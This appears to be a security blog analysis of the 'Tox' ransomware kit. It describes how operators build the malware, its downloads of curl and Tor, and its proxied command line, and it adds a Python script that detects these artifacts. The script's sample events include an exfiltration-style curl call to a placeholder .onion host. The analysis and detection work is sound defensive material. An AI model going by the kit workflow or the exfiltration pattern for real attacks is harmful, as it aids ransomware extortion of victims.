McAfee Labs recently discovered a ransomware kit called "Tox" being offered on the dark web.
Salient Points:
Tox is free. You just have to register on the site.
Tox depends on TOR and Bitcoin, which gives its operators some degree of anonymity.
The malware works as advertised.
Out of the gate, the kit's antimalware evasion is fairly good, so signature-based antivirus alone is unlikely to catch it; the malware's targets would need additional controls in place (HIPS, application whitelisting, sandboxing) to detect or prevent it.
Once you register for the product, you can create your malware in three simple steps.
Enter the ransom amount. (The site takes 20% of the ransom.)
Enter your “cause.”
Submit the captcha.
Network Information
The malware first downloads Curl and the TOR client:
hxxp://www.paehl.com/open_source/?download=curl_742_1.zip
hxxp://dist.torproject.org/torbrowser/4.5.1/tor-win32-0.2.6.7.zip
All downloaded files and artifacts are stored in the following path:
C:\Users\<username>\AppData\Roaming\
After execution, Tox starts the downloaded TOR client, which exposes a SOCKS5 proxy on 127.0.0.1:9050 (Tor's default SOCKS port), and then drives Curl through that proxy with the following command-line parameters (the en-dashes in the original are the usual rendering of a double hyphen):
--socks5-hostname 127.0.0.1:9050 --data \
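The staging behaviour above (two known download URLs, tor.exe and curl.exe dropped under AppData\Roaming, curl pointed at the local Tor SOCKS port) is enough to write a first-pass detection. The following Python is an added example written for this page, not McAfee's code or anything shipped with the Tox kit; it runs over a handful of constructed Sysmon-style process (EventID 1) and network (EventID 3) events plus proxy-log lines. The field names, the host name and the .onion destination in the sample data are assumptions, as is the single-hyphen tolerance in the curl regex; the two download URLs are the ones the post lists with the hxxp defanging undone.

```python
"""Detection logic for the Tox staging behaviour described above.

Added example, not from the original post: scans constructed Sysmon-style
process (EventID 1) and network (EventID 3) events and proxy-log lines for
the artifacts the post names.
"""
import re

# The two download URLs from the post, with hxxp defanging undone.
TOX_DOWNLOAD_URLS = {
    "http://www.paehl.com/open_source/?download=curl_742_1.zip",
    "http://dist.torproject.org/torbrowser/4.5.1/tor-win32-0.2.6.7.zip",
}

# key=value or key="quoted value" pairs, as in flattened Sysmon/XML output
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# tor.exe / curl.exe living directly under the user's AppData\Roaming
APPDATA_TOOL_RE = re.compile(r'\\AppData\\Roaming\\(?:tor|curl)\.exe$', re.IGNORECASE)
# curl routed through Tor's default SOCKS port (single-hyphen variant tolerated)
CURL_VIA_TOR_RE = re.compile(r'--?socks5-hostname\s+127\.0\.0\.1:9050')

# Constructed sample events (not real telemetry). Field names, host name and
# the .onion destination are assumptions made for this example.
SAMPLE_EVENTS = [
    r'EventID=1 Image="C:\Users\alice\AppData\Roaming\tor.exe" CommandLine="tor.exe -f torrc" ParentImage="C:\Users\alice\Downloads\invoice.scr"',
    r'EventID=1 Image="C:\Users\alice\AppData\Roaming\curl.exe" CommandLine="curl.exe --socks5-hostname 127.0.0.1:9050 --data key=abc http://example.onion/post" ParentImage="C:\Users\alice\Downloads\invoice.scr"',
    # Legitimate Tor Browser install: same binary name, different location -> must not fire
    r'EventID=1 Image="C:\Program Files\Tor Browser\Browser\TorBrowser\Tor\tor.exe" CommandLine="tor.exe" ParentImage="C:\Program Files\Tor Browser\Browser\firefox.exe"',
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\Windows\explorer.exe"',
    r'EventID=3 Image="C:\Users\alice\AppData\Roaming\curl.exe" DestinationIp=127.0.0.1 DestinationPort=9050',
    "url=http://www.paehl.com/open_source/?download=curl_742_1.zip host=ws01",
    "url=http://dist.torproject.org/torbrowser/4.5.1/tor-win32-0.2.6.7.zip host=ws01",
]


def parse_event(line):
    """Turn one key=value / key="quoted value" line into a dict."""
    return {k: (q if q else u) for k, q, u in KV_RE.findall(line)}


def check_event(ev):
    """Return the list of rule names that match one parsed event."""
    rules = []
    eid = ev.get("EventID")
    image = ev.get("Image", "")
    if ev.get("url", "").replace("hxxp://", "http://", 1) in TOX_DOWNLOAD_URLS:
        rules.append("known_download")
    if eid == "1" and APPDATA_TOOL_RE.search(image):
        rules.append("appdata_tor_curl")
    if eid == "1" and CURL_VIA_TOR_RE.search(ev.get("CommandLine", "")):
        rules.append("curl_over_tor")
    if (eid == "3" and ev.get("DestinationIp") == "127.0.0.1"
            and ev.get("DestinationPort") == "9050"
            and re.search(r'\\AppData\\Roaming\\', image, re.IGNORECASE)):
        rules.append("localhost_socks_from_appdata")
    return rules


def scan(lines):
    """Run every rule over every line; one finding per (event, rule) hit."""
    findings = []
    for idx, line in enumerate(lines):
        for rule in check_event(parse_event(line)):
            findings.append({"event": idx, "rule": rule})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']}")
```

Note that the path rule is anchored to AppData\Roaming so a real Tor Browser install under Program Files does not fire; in production the download-URL rule should be fed from proxy or DNS logs, and the curl rule is the higher-fidelity signal because a legitimate user rarely runs curl with --socks5-hostname against localhost.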